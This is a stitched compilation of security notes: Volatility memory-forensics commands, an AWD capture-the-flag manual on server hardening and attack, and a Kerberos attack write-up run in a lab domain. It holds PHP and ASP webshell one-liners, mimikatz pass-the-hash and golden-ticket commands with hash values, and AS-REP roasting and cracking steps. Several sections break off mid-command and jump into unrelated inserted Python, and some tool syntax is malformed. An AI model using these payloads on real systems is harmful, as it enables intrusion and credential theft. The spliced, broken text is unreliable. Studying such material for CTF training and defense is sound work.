volatility.exe -f worldskills3.vmem --profile=Win7SP1x64 shimcache

2.10 View parent and child processes
Note: if a process's PPID is larger than its PID, the process may be an anomalous program.
volatility.exe -f worldskills3.vmem --profile=Win7SP1x64 pstree

2.11 View program version information
volatility.exe -f worldskills3.vmem --profile=Win7SP1x64 verinfo

2.12 Query processes with pslist
volatility.exe -f worldskills3.vmem --profile=Win7SP1x64 pslist
Note: pslist lists the system's processes, but it cannot detect hidden or unlinked processes.
You can also look further at a single process and its children:
volatility.exe -f worldskills3.vmem --profile=Win7SP1x64 pslist -p 2588

2.13 View hidden or unlinked processes
volatility.exe -f worldskills3.vmem --profile=Win7SP1x64 psscan
or
volatility.exe -f worldskills3.vmem --profile=Win7SP1x64 psxview
Note: these find previously terminated (inactive) processes as well as processes hidden or unlinked by a rootkit.

2.14 Display the cmd command history
volatility.exe -f worldskills3.vmem --profile=Win7SP1x64 cmdscan
or
volatility.exe -f worldskills3.vmem --profile=Win7SP1x64 consoles   # shows the input and output of the commands

2.15 View process command line parameters
volatility.exe -f worldskills3.vmem --profile=Win7SP1x64 cmdline

2.16 Scan the list of all files in memory
volatility.exe -f worldskills3.vmem --profile=Win7SP1x64 filescan
On Linux you can combine filescan with grep to search for keywords:
python2 vol.py -f worldskills3.vmem --profile=Win7SP1x64 filescan | grep 'flag'
python2 vol.py -f worldskills3.vmem --profile=Win7SP1x64 filescan | grep -E 'jpg|png|jpeg|bmp|gif'
Search for pictures or text:
python2 vol.py -f worldskills3.vmem --profile=Win7SP1x64 filescan | grep -E 'txt'
python2 vol.py -f worldskills3.vmem --profile=Win7SP1x64 filescan | grep -E 'jpg'
Export the flag.txt file:
python2 vol.py -f worldskills3.vmem --profile=Win7SP1x64 dumpfiles -Q 0x000000007f1b6c10 -D ./
For a dumped process file it is recommended to use foremost to separate the files embedded in it.

2.17 View file contents (used together with a filescan query)
volatility.exe -f worldskills3.vmem --profile=Win7SP1x64 dumpfiles -Q 0
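As an added example (my own code, not from the original post), here is a small Python script that applies the pslist/psscan comparison from items 2.12 and 2.13 and the "PPID larger than PID" heuristic from item 2.10 to saved Volatility 2 output. The two tables are constructed sample output, not from worldskills3.vmem.

```python
import re
from typing import List, NamedTuple


class Proc(NamedTuple):
    offset: int
    name: str
    pid: int
    ppid: int


# Both pslist and psscan rows start with "offset name PID PPID ..."; the
# remaining columns differ between the two plugins and are ignored here.
_ROW = re.compile(r"^(0x[0-9a-fA-F]+)\s+(\S+)\s+(\d+)\s+(\d+)\b")


def parse_process_table(text: str) -> List[Proc]:
    """Parse offset, name, PID and PPID from a pslist or psscan table.
    Header, separator and blank lines do not start with 0x and are skipped."""
    procs = []
    for line in text.splitlines():
        m = _ROW.match(line.strip())
        if m:
            procs.append(Proc(int(m.group(1), 16), m.group(2),
                              int(m.group(3)), int(m.group(4))))
    return procs


def hidden_processes(pslist_text: str, psscan_text: str) -> List[Proc]:
    """Processes psscan found (pool-tag scan of physical memory) that pslist did
    not (walk of the linked EPROCESS list): unlinked by a rootkit or already exited."""
    listed = {p.pid for p in parse_process_table(pslist_text)}
    return [p for p in parse_process_table(psscan_text) if p.pid not in listed]


def ppid_anomalies(procs: List[Proc]) -> List[Proc]:
    """Heuristic from the post: a parent PID larger than the child's PID means the
    parent was created later than the child, which deserves a closer look."""
    return [p for p in procs if p.ppid > p.pid]


# Constructed sample output (Volatility 2 column layout); svchost.exe 3120 is
# present only in the psscan table, i.e. hidden from the active process list.
PSLIST = """\
Offset(V)          Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                          Exit
------------------ -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ----
0xfffffa8000ca0b30 System                    4      0     85      535 ------      0 2023-10-08 09:12:01 UTC+0000
0xfffffa8001a2b060 csrss.exe               352    344      9      462      0      0 2023-10-08 09:12:04 UTC+0000
0xfffffa8001b4c2c0 explorer.exe           1532   1488     34      917      1      0 2023-10-08 09:12:30 UTC+0000
0xfffffa8001c9d760 cmd.exe                2588   1532      1       21      1      0 2023-10-08 10:01:17 UTC+0000
0xfffffa8001d1e4a0 update.exe             1996   3120      3       88      1      0 2023-10-08 10:03:55 UTC+0000
"""

PSSCAN = """\
Offset(P)          Name                PID   PPID PDB                Time created                   Time exited
------------------ ---------------- ------ ------ ------------------ ------------------------------ ----
0x000000003d0a0b30 System                4      0 0x0000000000187000 2023-10-08 09:12:01 UTC+0000
0x000000003e2ab060 csrss.exe           352    344 0x000000001f9c8000 2023-10-08 09:12:04 UTC+0000
0x000000003f14c2c0 explorer.exe       1532   1488 0x0000000024e1b000 2023-10-08 09:12:30 UTC+0000
0x000000003f29d760 cmd.exe            2588   1532 0x000000002a3c0000 2023-10-08 10:01:17 UTC+0000
0x000000003f31e4a0 update.exe         1996   3120 0x000000002b7d1000 2023-10-08 10:03:55 UTC+0000
0x000000003f40f9b0 svchost.exe        3120   2588 0x000000002c055000 2023-10-08 10:03:40 UTC+0000
"""

if __name__ == "__main__":
    for p in hidden_processes(PSLIST, PSSCAN):
        print("hidden/unlinked:", p.name, p.pid, "parent", p.ppid)
    for p in ppid_anomalies(parse_process_table(PSLIST)):
        print("ppid > pid:", p.name, p.pid, "parent", p.ppid)
```

Redirect `pslist` and `psscan` output to files and feed their contents to the two functions; psscan also reports exited processes, so confirm a hit with psxview before calling it hidden.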
-
Title: AWD offensive and defense competition instruction manual
0# What is AWD
0.1# Introduction to the AWD competition format
"Attack With Defense (AWD)" is one of the main game modes in CTF (Capture The Flag) competitions and is commonly seen in offline events. In this mode, each team gets an identical initial environment (called a GameBox) that runs certain services or applications, which usually contain security vulnerabilities. Teams need to exploit the vulnerabilities in opposing teams' services to obtain flags and score points; at the same time, they need to patch their own services to stop other teams from obtaining their flags. The main characteristics are practicality, real-time play and confrontation, testing both the penetration and protection capabilities of each team.

0.2# Overall process of the competition
Pre-match preparation: multiple target servers are allocated, usually with SSH or VNC usernames and passwords and the related IP information.
Security reinforcement: log into the target servers and perform 30 minutes of hardening (source code backup, weak password changes, code auditing and repair, vulnerability fixes, etc.).
Free attack: after the hardening period, attacking the target servers of other teams (weak passwords, web vulnerabilities, system vulnerabilities, etc.) earns extra points, and the attacked team loses points.
1# Competition environment
There are usually three kinds of environment:
Mixed targets: operations machine Windows 10 + attack machine Kali Linux + Windows target (Windows Server 2003/2008/2012 or Windows 7) + Linux target (CentOS 7.x or Ubuntu 16.04/17.01/20.04)
Pure Linux targets: operations machine Windows 10 + attack machine Kali Linux + Linux target (CentOS 7.x or Ubuntu 16.04/17.01/20.04)
Pure Windows targets: operations machine Windows 10 + attack machine Kali Linux + Windows target (Windows Server 2003/2008/2012 or Windows 7)

2# Security reinforcement process (defense)
2.0# Basic reinforcement process
2.0.1 Windows reinforcement process
Back up first: web source code and database.
Harden port 445; enable the firewall or IP security policies.
Turn on system log auditing.
Disable the guest account and turn off file sharing.
Make sure the startup items are under control.
Limit the number of remote access connections: in the Local Group Policy Editor, expand Computer Configuration - Administrative Templates - Windows Components - Remote Desktop Services - Remote Desktop Session Host - Connections - Limit number of connections.
Use tools to monitor key directories and files: file operation monitor.exe, Yujian file monitor.exe.
Look for malicious code files with PCHunter and Monitor.
Search the web directory for suspicious files (jpg/png/rar): view their properties, decompress them and inspect the contents.
Scan the NTFS disk for hidden alternate data streams.
Find all accounts on the system and disable non-Administrator accounts.
Change the web site admin access path, the default password, and the database password.
Install WAF scripts to protect the web site and block other vulnerabilities.

2.0.2 Linux reinforcement process
Back up first: web source code and database.
Change the system password to the team's unified password.
Search .bash_history for historical commands and traces.
View scheduled tasks: crontab -l; edit scheduled tasks: crontab -e.
Check for anomalous startup services under /etc/init.d/ and in rc.local.
Use scripts for process monitoring, directory monitoring, and traffic monitoring.
Change the web site password and the site admin path.
System hardening: iptables.

2.1# Basic information collection
Information collection matters when defending too. As the saying goes, "Know yourself and your enemy, and you will never be defeated in a hundred battles."

2.1.1 Linux machine information
uname -a                      // system information
ps -aux                       // query process information
ps -ef | grep <process name>  // filter the specified process
id                            // display the user ID and group IDs
cat /etc/passwd               // view the users
ls /home                      // view the users' home directories
find / -type d -perm -002     // writable directory check
ifconfig                      // view network card information on Linux

2.1.2 Windows machine information
whoami /all      // view user details on Windows
ipconfig /all    // view network card information on Windows

2.1.3 View open ports
netstat                  // view active connections
netstat -ano / netstat -a  // check port status
netstat -anp             // view ports with their owning processes
firewall-cmd --zone=public --remove-port=80/tcp --permanent   // close the port
firewall-cmd --reload    // reload the firewall

2.1.4 Default (weak) password change
To prevent weak password attacks: the MySQL password is root by default and the phpStudy default password is 123456; other default passwords include admin and the top100/top1000 lists.
In particular, change the backend password of the web application.

passwd username //Change the SSH (system) password
set password for mycms@localhost=password('18ciweufhi28746'); //Change the MySQL password
find /var/www/html -path '*config*' //Find password credentials in the configuration files

2.1.5 Find the local flag

grep -r 'flag' /var/www/html/ //Linux: search the web directory for flags
findstr /s /i 'flag' *.* //Windows: search for the string 'flag' in the current directory and all subdirectories

2.1.6 Disabling ping

echo '1' > /proc/sys/net/ipv4/icmp_echo_ignore_all //Temporarily ignore ping
echo '0' > /proc/sys/net/ipv4/icmp_echo_ignore_all //Answer ping again

2.2# Web security reinforcement

2.2.1 Back up the source code

Have a copy ready in case a change to the source code breaks something, or the attacking side deletes it.

Compress the source code:
tar -cvf web.tar /var/www/html
zip -q -r web.zip /var/www/html

Decompress the source code:
tar -xvf web.tar -C /var/www/html
unzip web.zip -d /var/www/html

Move the backup aside:
mv web.tar /tmp
mv web.zip /home/xxx

Upload and download the source code:
scp username@servername:/path/filename /tmp/local_destination //Download a single file from the server
scp /path/local_filename username@servername:/path //Upload a single file to the server
scp -r username@servername:remote_dir /tmp/local_dir //Download a whole directory from the server
scp -r /tmp/local_dir username@servername:remote_dir //Upload a whole directory to the server

2.2.2 Set read-only permissions

Set read-only plus execute permissions on the web files (dynamic languages such as PHP need execute):
chmod 0555 /var/www/html/*
chmod 0555 /var/www/html/*.php

Set read-only plus execute permissions on the web root directory:
chmod 0555 /var/www/html

Change the files' owner and group to tighten permissions:
chown -R root:root /var/www/html/ //Set the owner to root:root or httpd:httpd (recommended)
chown -R apache:apache /var/www/html/ //Make sure apache owns /var/www/html/

2.2.3 Configuring .htaccess

Use an .htaccess configuration to prohibit execution of PHP files:

<Directory "/var/www/html/upload"> //The directives that follow apply to this directory
Options -ExecCGI -Indexes //Disable CGI execution and directory indexing (directory listings) in the directory
AllowOverride None //Do not let an .htaccess file override the server configuration in this directory
RemoveHandler .php .phtml .php3 .pht .php4 .php5 .php7 .shtml
RemoveType .php .phtml .php3 .pht .php4 .php5 .php7 .shtml
//These two directives remove the handler and MIME type for the listed extensions, so the PHP-related extensions and server-side include (SSI) files drop out of Apache's processing list
php_flag engine off //Turns the PHP engine flag off, so PHP scripts cannot execute in this directory
<FilesMatch ".+\.ph(p[3457]?|t|tml)$">
deny from all
</FilesMatch>
//These three lines match files ending in .php, .phtml, .php3, .pht, .php4, .php5, .php7 or .shtml by regular expression and deny all access to them
</Directory>

2.2.4 PHP parameter security configuration

First find the PHP configuration file: /etc/php/{version}/php.ini

Disable high-risk functions:
disable_functions=dl,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail,imap_open,imap_mail,putenv,ini_set,apache_setenv,symlink,link

Configure open_basedir (restricts the files PHP may access to the given paths):
open_basedir=/var/www/html

Disable magic quotes (the option that automatically escaped external input to prevent SQL injection):
magic_quotes_gpc=Off

Close the PHP pseudo-protocols:
allow_url_fopen=Off
allow_url_include=Off

Restart PHP:
sudo service php7.0-fpm restart
sudo systemctl restart php7.0-fpm.service

2.3# Database security reinforcement

2.3.1 MySQL reinforcement

To prevent weak-password attacks: MySQL's password is root by default and phpstudy's default password is 123456. Do not keep the default password; change it to something complex and make sure the web application can still connect.
Allow logins from local 127.0.0.1 only: set bind-address=127.0.0.1 and add secure_file_priv=NULL to the configuration file.
Turn on log auditing: general_log_file=path

Because MySQL is the most commonly used database, most basic attack and defense work revolves around MySQL commands.

Back up a specified database:
mysqldump -u username -ppassword databasename > target.sql
Back up all databases:
mysqldump -u username -ppassword --all-databases > all.sql
Import a database:
mysql -u username -ppassword database < from.sql

For MySQL offense and defense, see this article: https://blog.zgsec.cn/archives/26.html

MySQL default configuration file paths:
C:\Program Files\MySQL\MySQL Server 5.1\my.ini //Windows
/etc/my.cnf //Linux
/etc/mysql/my.cnf //Linux

Modify the secure_file_priv parameter (the directory that MySQL's file read/write functions are restricted to):
secure_file_priv=''
Reload MySQL privileges:
FLUSH PRIVILEGES
Restart the MySQL service:
sudo service mysql restart
sudo systemctl restart mysql

2.3.2 MSSQL reinforcement

Delete unnecessary accounts
SQL Server user password security
Avoid sharing accounts between users
Assign database users the minimum permissions they need
Network access restrictions
SQL Server login auditing
SQL Server security event auditing
Configure logging

2.4# Remote control reinforcement

2.4.1 SSH security reinforcement

Restrict logins by IP:
sudo nano /etc/ssh/sshd_config //Edit the SSH configuration file as root
AllowUsers <user>@<ip> //Make sure this line is uncommented and set to the desired user and IP address (placeholder values)

Disable root remote login:
sudo nano /etc/ssh/sshd_config //Edit the SSH configuration file as root
PermitRootLogin no //Set PermitRootLogin to "no"

Restrict SSH login by user and group:
sudo nano /etc/ssh/sshd_config //Edit the SSH configuration file as root
AllowUsers testuser //Only testuser may log in over SSH
AllowUsers testuser@192.168.1.100 //Only the testuser account from the 192.168.1.100 machine may log in over SSH
AllowGroups test //Whitelist a user group
//Note that if AllowUsers and AllowGroups are both specified, only users matching both may log in over SSH

Restart the SSH service:
sudo service sshd restart
sudo systemctl restart sshd.service

2.4.2 RDP remote login security reinforcement

Remove the default accounts and add new users manually:
Step 1: Press Win + R to open the Run dialog, enter secpol.msc and click OK
Step 2: Navigate to Local Policies - User Rights Assignment, then double-click "Allow log on through Remote Desktop Services"
Step 3: Remove Administrators and Remote Desktop Users (or any other user or group on the computer) listed in this window
Step 4: Then click "Add User or Group" and manually add the users you want to grant remote desktop access

Change the default RDP port number:
Step 1: Open the Run dialog, enter regedit and click OK
Step 2: Open HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp, scroll down to PortNumber and double-click it
Step 3: Select "Decimal", enter the port number you want, then click "OK"

2.5# Emergency response

2.5.1 Query processes and threads

netstat
ps -aux
netstat -apt

2.5.2 Kill a process

kill -9 pid //on Linux
taskkill /f /pid pid //on Windows

2.5.3 Search for WebShell files

find /var/www/html -name '*.php' -mmin -5 //Files modified in the last 5 minutes
find . -name '*.php' | xargs wc -l | sort -n //Find the files with the fewest lines; these are usually the trojans
grep -r --include=*.php '[^a-z]eval($_POST' /var/www/html //Find PHP files containing the keyword
find /var/www/html -type f -name '*.php' | xargs grep 'eval(' | more //On Linux, combine find, grep and xargs to list all .php files under /var/www/html, search them for lines containing 'eval(', and page the output with more so long results can be read page by page

2.5.4 Find and kill trojans

You can also search and kill automatically with a command:
ps -aux | grep www-data | grep -v grep | awk '{print $2}' | xargs kill -9
Then restart the service:
service php-fpm restart

2.5.5 Kill reverse shells

As usual, look at the processes first:
ps -ef
ps -aux
ps -aux | grep www-data
Note that a /bin/sh running as www-data is very likely nc.
Then the usual kill command:
kill $(ps -aux | grep www-data | grep apache2 | awk '{print $2}')

3# Free attack phase (Attack)

3.0# Main content

Prepare the latest versions of the various CMS packages
Scanning tools: Nmap, Nessus, Metasploit updates
Exploit scripts: PoC, Exp

3.1# Basic information collection

3.1.1 Host information collection

Nmap
nmap -sn 192.168.0.0/24 //Host discovery sweep of the /24 (class C) segment
httpscan
httpscan.py 192.168.0.0/24 -t 10 //Host discovery sweep of the /24 segment

3.1.2 Port scan

nmap -sV 192.168.0.2 //Scan the host's service versions
nmap -sS 192.168.0.2 //Scan the host's commonly used ports
nmap -sS -p 80,445 192.168.0.2 //Scan selected ports on the host
nmap -sS -p- 192.168.0.2 //Scan all ports on the host

Python script:
import requests
for x in range(2,255):
    url='http://192.168.1.{}'.format(x)
    try:
        r=requests.post(url)
        print(url)
    except:
        pass

3.2# External management

3.2.0 Common system vulnerabilities

MS17-010 (EternalBlue; see https://blog.zgsec.cn/archives/172.html)
MySQL UDF privilege escalation (SQL injection or MySQL weak password)
MSSQL system command execution (SQL injection or MSSQL weak password)
SSH weak or default password
PWN (depends on the specific content provided by the AWD competition)

3.2.1 Middleware vulnerabilities

IIS (parsing vulnerabilities, remote code execution)
Apache (parsing vulnerability)
Nginx (parsing vulnerability)
JBoss (CVE-2017-7504 / CVE-2017-12149 / CVE-2015-7501)
MySQL (weak password)
Tomcat (weak password, getshell)
WebLogic (CVE-2020-2551 / CVE-2020-2555 / CVE-2020-2883)
SpringBoot (unauthorized access and RCE vulnerabilities; see https://blog.zgsec.cn/archives/129.html)

3.2.2 Vulnerabilities in integrated service environments

wampserver
xampserver

3.2.3 CMS vulnerability exploitation

Collect the latest versions of the CMSes together with the corresponding PoC and Exp; only some of the CMSes are listed here:
Aspcms, Dedecms, Discuz, Drupal, Empirecms, Eshop, Finecms, Joomla, Lamp, Metainfo, Phpcms, Phpwind, Qibocms, Seacms, Semcms, ThinkPHP, Wolfcms, Wordpress, Zabbix

Backup file brute-forcing: use directory scanning tools such as 7kbScan against the web system

3.2.4 Upload a WebShell

The usual one-line trojans:
PHP: <?php @eval($_POST['pass']);?>  <?php eval($_GET['pass']);?>
Asp: <%eval request('pass')%>
Aspx: <%@ Page Language='Jscript
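A check for the php.ini settings from section 2.2.4, added here as an example and not code from the original post: it parses a php.ini text and reports every setting that differs from the hardened values above. The minimal parser, the function names and the two sample configurations (weak and hardened) are this example's own constructions.

```python
"""Check a php.ini against the hardening settings of section 2.2.4.

Added example for this page, not from the original post. The parser is
deliberately minimal (key = value lines, ';' comments, [sections] ignored);
parse_php_ini() and check_php_ini() are this example's own names.
"""

# Functions the post disables; any of them missing from disable_functions is a finding.
EXPECTED_DISABLED = {
    "dl", "exec", "system", "passthru", "popen", "proc_open", "pcntl_exec",
    "shell_exec", "mail", "imap_open", "imap_mail", "putenv", "ini_set",
    "apache_setenv", "symlink", "link",
}

# PHP's own defaults when a key is absent from php.ini.
PHP_DEFAULTS = {"allow_url_fopen": "On", "allow_url_include": "Off", "open_basedir": ""}


def parse_php_ini(text: str) -> dict:
    """Return {key: value} for 'key = value' lines, ignoring comments and section headers."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()      # drop full-line and trailing comments
        if not line or line.startswith("["):
            continue
        key, sep, value = line.partition("=")
        if sep:
            settings[key.strip()] = value.strip().strip('"').strip("'")
    return settings


def is_off(value: str) -> bool:
    """php.ini booleans: Off/0/no/false/none/empty all mean disabled."""
    return value.strip().lower() in ("off", "0", "no", "false", "none", "")


def check_php_ini(text: str) -> list:
    """Return a list of findings; an empty list means every check passed."""
    cfg = parse_php_ini(text)
    findings = []

    disabled = {f.strip() for f in cfg.get("disable_functions", "").split(",") if f.strip()}
    missing = sorted(EXPECTED_DISABLED - disabled)
    if missing:
        findings.append("disable_functions is missing: " + ", ".join(missing))

    if not cfg.get("open_basedir", PHP_DEFAULTS["open_basedir"]):
        findings.append("open_basedir is not set; PHP may read files anywhere on disk")

    for key in ("allow_url_fopen", "allow_url_include"):
        if not is_off(cfg.get(key, PHP_DEFAULTS[key])):
            findings.append(f"{key} is enabled (remote URLs usable in file functions or include)")

    return findings


# Constructed sample configurations: a stock install and the hardened version from the post.
WEAK_INI = """
[PHP]
; stock configuration: nothing disabled, allow_url_include left at its default
disable_functions =
allow_url_fopen = On
"""

HARDENED_INI = """
[PHP]
disable_functions = dl,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail,imap_open,imap_mail,putenv,ini_set,apache_setenv,symlink,link
open_basedir = /var/www/html
allow_url_fopen = Off
allow_url_include = Off
"""

if __name__ == "__main__":
    for name, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(f"{name}: {check_php_ini(ini) or ['ok']}")
```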
-
Title: Summary of some attack methods for Kerberos authentication
Kerberos authentication process

Preface

This article mainly shares some of the attack methods against Kerberos authentication in a domain that I have learned recently. It is mostly my own understanding, going from the principles to basic tool usage. The personal understanding and analysis parts are rather long; if you find it too long, feel free to skip around. Please forgive me, and if there are errors I ask the masters to correct them.

The Kerberos authentication process here is only a simple description; many details are left out, such as the PAC, S4U2SELF (delegation), S4U2PROXY (delegation) and so on. For a detailed treatment, the articles written by Master daiker are recommended.

The environment for this article is VulnStack, the Hongri shooting range:

Domain controller: owa, win2008R2, 192.168.52.138
Domain host: stu1, win7, 192.168.52.130
Out-of-domain host: k0uaz, win7 (can reach the domain controller), 192.168.52.162

Parties and roles involved:

Domain Controller (DC): a computer that centrally manages the domain's users and computers
Key Distribution Center (KDC): installed on the domain controller by default; consists of the AS and the TGS
Authentication Service (AS): the part of the KDC that authenticates the Client
Ticket Granting Service (TGS): the part of the KDC that distributes Session Keys (temporary keys) to the Client and Server
Active Directory (AD): stores information about users, user groups and the domain
Client: the user. The server side may be a computer account or a service.

Process and principles

The figure above involves three request/response exchanges: Client with the KDC's AS, Client with the KDC's TGS, and Client with the Server.
The detailed requests and responses are as follows:

AS-REQ: The Client sends an authentication request to the KDC (AS). The credential it presents is a timestamp encrypted with the Client's NTLM hash, together with other identity information.
AS-REP: The AS decrypts with the Client's NTLM hash. If verification succeeds, it returns a TGT encrypted with the KRBTGT hash (this is sent to the TGS in TGS-REQ and exchanged for an ST). The TGT contains the PAC.
TGS-REQ: The Client caches the TGT locally (it cannot decrypt it) and presents it to the TGS to exchange for an ST for the service it wants to access.
TGS-REP: The TGS decrypts the TGT with the KRBTGT hash. If the result is correct, it returns an ST (service ticket) encrypted with the hash of the server providing the service (the machine account hash).
AP-REQ: The Client presents the ST it obtained to the Server to request the resource.
AP-REP: The Server decrypts the ST with its own hash. If decryption succeeds, it uses the PAC it obtained to ask the KDC whether the Client is allowed access. After decrypting the PAC, the KDC gets the user's SID and group information and checks them against the access control list (ACL). If they match, the Server returns the resource to the Client.

Kerberos-related security issues

Pass The Key (Hash)

Pass the Hash

Pass the Hash works with NTLM authentication and also with Kerberos authentication, both outside the domain and inside it. In Kerberos authentication, the AS-REQ sent to the AS carries information encrypted with the Client's hash, so if we obtain the Client's NTLM hash we can gain access to other hosts laterally through Pass the Hash.

Usage

Here we assume the NTLM hash of a domain admin logged on to some domain machine has been obtained. Tools for PTH:
Mimikatz: since the credentials are injected into lsass, local administrator rights (bypassing UAC) are required to enable SeDebugPrivilege.
After injection, the user's credentials can be used to access hosts in the domain. wmiexec (the .py or the .exe) can also PTH; it needs no administrator rights and is suited to running commands remotely. CME can verify PTH in batches, and so on.

Here Mimikatz is used as the example. The hack user (a member of stu1's local administrators group and a domain user) has no access to the domain controller's shared directory. Inject credentials with mimikatz:
mimikatz 'privilege:debug' 'sekurlsa:pth /user:a /domain:god.org /rc4:b4ab235f987be3621a4ebd862189fd34'

Pass the Key

Mimikatz's information tip:
ntlm hash is mandatory on XP/2003/Vista/2008 and before 7/2008r2/8/2012 kb2871997 (AES not available or replaceable) ; AES keys can be replaced only on 8.1/2012r2 or 7/2008r2/8/2012 with kb2871997, in this case you can avoid ntlm hash.

Pass the Key can only be used inside the domain. The versions that support AES encryption are win8.1/2012r2, or win7/2008r2/8/2012 with the kb2871997 patch installed.

Usage

Get the AES key, then use the sekurlsa:pth module:
mimikatz 'privilege:debug' 'sekurlsa:pth /user:administrator /domain:god.org /aes256:bf723755bc5f72a377bda41ca58fd925df7ee45df9a026ac5cd320102a3a2e33'

Since the Win7 host is not patched, Pass the Key naturally fails. In a real environment, when PTH with RC4 encryption is not supported, the account may be in the Protected Users group; then try AES128 and AES256 encryption for PTK.

Pass The Hash With Remote Desktop (Restricted Admin mode)

In 2014 Microsoft released the KB2871997 patch, which mainly covers the enhanced security protections of Windows 8.1 and Windows Server 2012 R2. Earlier systems such as Windows 7, Windows 8, Windows Server 2008 R2 and Windows Server 2012 can therefore install this patch to obtain the same protections.
————————————————————————————————————————————————
Restricted Admin RDP mode remote desktop client support: Prior to this update, RDP logon was an interactive logon that could only be used after the user provided a user name and password. When logging on to an RDP host this way, the user's credentials are placed in the RDP host's memory, and if the host is compromised they can be stolen. This update lets RDP use network logon, where the user's existing logon token is used to authenticate for RDP access. Using this logon type ensures the user's credentials are not stored on the RDP server, thus protecting the credentials.

From the explanation above, this mode protects the credentials of users who log on with RDP: with network-style authentication the RDP server does not hold the user's credentials.

Usage

win8.1 and win2012R2 and later support Restricted Admin mode; on win8.1 and win2012R2 it is enabled by default.
Condition: the client supports Restricted Admin mode and the server has Restricted Admin mode enabled.

Since no win2012R2 was at hand, two Windows 10 machines are used here for Pass the Hash with Remote Desktop.

First obtain the NTLM hash.

Inject the NTLM hash with mimikatz (run privilege:debug first to get the debug privilege; the screenshot is missing here):
sekurlsa:pth /user:administrator /domain:192.168.226.137 /ntlm:9c3767903480e04c089090d27123eaf9 '/run:mstsc.exe /restrictedadmin'
/domain specifies the computer name or IP.

Do not tick "always ask for credentials" here.

Restricted Admin mode is enabled through the registry (0 is on, 1 is off; full administrator rights are required), after which the RDP connection is made again:
REG ADD 'HKLM\System\CurrentControlSet\Control\Lsa' /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f

After Restricted Admin mode is enabled on the remote host, the RDP connection succeeds, and you can see the hash injected into memory.

Here I used the administrator account K0uaz, so Pass the Hash with Remote Desktop only requires local administrator rights on the target, not necessarily the local administrator account with SID 500. If the user is only in Remote Desktop Users and not in the Administrators group, however, it will not succeed, because this mechanism is for restricted administrators.

AS-REP Roasting

Principle

In AS-REP the KDC returns a Session Key encrypted with the user's NTLM hash (the Session Key secures communication between the Client and the TGS). Under the RC4_HMAC encryption type we can run the same encryption over candidate plaintext passwords and compare the results with the returned ciphertext to see whether a guess is correct.

Although the Session Key ciphertext encrypted with the user's NTLM hash in the figure above uses AES256, we can use the encryption downgrade method here (the same technique Kerberoast uses to get RC4_HMAC-encrypted data from accounts that support AES) by declaring that the highest encryption type the client supports is RC4_HMAC, so that the ciphertext returned in AS-REP is RC4_HMAC and the plaintext password can be cracked.

One problem remains: pre-authentication. In AS-REQ a Timestamp encrypted with the Client hash is sent to the KDC. The KDC decrypts the ciphertext to obtain the timestamp; if decryption succeeds and the timestamp is within 5 minutes, pre-authentication succeeds. The KDC verifies the client identity this way, which effectively prevents brute-force cracking.
As for why AS-REQ is sent twice by default, the explanation from harmj0y's article is that the client does not know in advance which encryption types are supported (I think specifically it does not know the encryption type for the pre-authentication Timestamp), so it first asks which encryption types the KDC supports.

Therefore, by turning off pre-authentication, we can crack the plaintext password by exhaustive brute force. After pre-authentication is turned off there is no second AS-REQ, and the only AS-REQ no longer contains the Timestamp ciphertext encrypted with the NTLM hash.

Usage

Domain users with the "Do not require Kerberos preauthentication" attribute can be queried through LDAP. The query condition is:
userAccountControl:1.2.840.113556.1.4.803:=4194304

Rubeus is used as the example here:
Rubeus.exe asreproast /nowrap /format:hashcat

Crack with hashcat:
hashcat -m 18200 hash.txt passwords.dict --force

Analysis of how Rubeus asreproast works

Looking at the traffic in Wireshark, the module queries the domain users with that attribute through LDAP, then sends AS-REQ packets in batches, extracts the NTLM-hash-encrypted part from each response and formats it for hashcat.
LDAP query
The supported encryption type is declared as RC4_HMAC only
The returned ciphertext is encrypted with RC4_HMAC (so it can be brute-forced)

Golden Ticket

Features

Requires communication with the DC (no interaction with the AS, but the TGS is needed)
Requires the hash of the krbtgt user

Principle

During Windows Kerberos authentication the Client sends its information to the KDC, and the KDC uses the krbtgt user's NTLM hash as the key to encrypt and generate the TGT. So if the krbtgt NTLM hash is obtained, can any TGT be forged?
Because krbtgt exists only on domain controllers, using a golden ticket implies that domain controller privileges were obtained beforehand; a golden ticket is better understood as a backdoor.

Conditions:
1. The domain name
2. The domain's SID
3. The password hash of the domain's KRBTGT account
4. The forged username can be arbitrary (within the TGT's 20-minute lifetime the KDC service on the domain controller does not verify the user account in the TGT)

Once we have the krbtgt hash we can use it to make a golden ticket. Suppose we obtained the krbtgt hash through the dcsync attack (explained and practiced below).

Condition 1: scan the SPNs to get the domain name god.org
Condition 2: whoami /all gives the domain user's SID; strip the last component to get the domain SID
Condition 3: krbtgt account hash 58e91a5ac358d86513ab224312314061
Condition 4: forged username administrator

Make the golden ticket with mimikatz kerberos:golden, which forges the TGT.

Default groups in a golden ticket:
Domain Users SID: S-1-5-21-DOMAINID-513
Domain Admins SID: S-1-5-21-DOMAINID-512
Schema Admins SID: S-1-5-21-DOMAINID-518
Enterprise Admins SID: S-1-5-21-DOMAINID-519 (only valid when the forged ticket is created in the forest root domain; otherwise add the /sids parameter for AD forest administrator rights)
Group Policy Creator Owners SID: S-1-5-21-DOMAINID-520

mimikatz.exe 'kerberos:golden /domain:god.org /sid:S-1-5-21-2952760202-1353902439-2381784089 /user:administrator /krbtgt:58e91a5ac358d86513ab224312314061 /ticket:k0u.kiribi' exit

Tip: /endin:xx and /renewmax:xx can be added to change the ticket's validity period and the maximum renewal period. Mimikatz defaults to 10 years.

The generated ticket can be imported on other domain machines, or the TGT can be injected directly into memory with /ptt.

First clear the ticket cache:
klist purge
Then inject the ticket into the cache with mimikatz:
kerberos:ptt k0u.kiribi
klist shows the ticket cache, with the forged TGT visible.
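A defender-side audit for the AS-REP Roasting condition described above: it decodes the userAccountControl bit that the LDAP filter value 4194304 tests and ranks the exposed accounts. Added example, not code from the original post; the Account and Finding record shapes, the audit_preauth() name and the sample directory export are constructed for the demonstration.

```python
"""Audit directory accounts for AS-REP Roasting exposure.

Added example for this page, not code from the original post. It decodes the
userAccountControl bit that the post's LDAP filter tests (4194304 = 0x400000,
DONT_REQUIRE_PREAUTH) over constructed LDAP-style records so it runs offline.
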